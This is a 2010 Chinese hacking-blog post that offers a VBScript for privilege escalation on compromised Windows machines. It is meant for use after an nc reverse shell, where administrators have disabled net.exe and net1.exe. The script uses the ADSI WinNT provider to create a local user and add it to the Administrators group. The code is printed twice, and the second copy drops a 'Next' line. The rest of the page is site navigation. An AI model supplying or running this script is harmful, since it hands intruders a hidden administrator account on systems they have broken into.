无net提权的脚本

2010-09-28 23:16 作者: 诗人博客来源: 本站浏览: 2,054 views 我要评论字号: 大中小

真正的无net加系统用户能用的脚本。。当我们遇到提权的时候，nc反弹提权的时候，管理员把net1和net给禁用了，，我们可以上传一个脚本，，做到真正的无net加系统用户。。脚本代码如下：

struser=wscript.arguments(0)
strpass=wscript.arguments(1)

set lp=createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe.Add(of.ADsPath)

For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " 建立成功!"
wscript.quit
end if
Next

Wscript.echo struser & " 用户建立失败!"

struser=wscript.arguments(0)

strpass=wscript.arguments(1)

set lp=createObject("WSCRIPT.NETWORK")

oz="WinNT://"&lp.ComputerName

Set ob=GetObject(oz)

Set oe=GetObject(oz&"/Administrators,group")

Set od=ob.create("user",struser)

od.SetPassword strpass

od.SetInfo

Set of=GetObject(oz&"/" & struser & ",user")

oe.Add(of.ADsPath)

For Each admin in oe.Members

if struser=admin.Name then

Wscript.echo struser & " 建立成功!"

wscript.quit

end if

Wscript.echo struser & " 用户建立失败!"

随机推荐

打印

分享到：

复制链接

上一篇: 分析DEDECMS 5.5 datalistcp.class.php

下一篇: IIS put Scanner

无net提权的脚本

随机推荐

发表评论

会员登录关闭

注册会员关闭

最多关注全部本月本周

分类目录

随机文章

广而告之

无net提权的脚本

扫描二维码手机访问

相关阅读

随机推荐

发表评论

会员登录关闭

注册会员关闭

最多关注全部本月本周

分类目录

随机文章

标签云

广而告之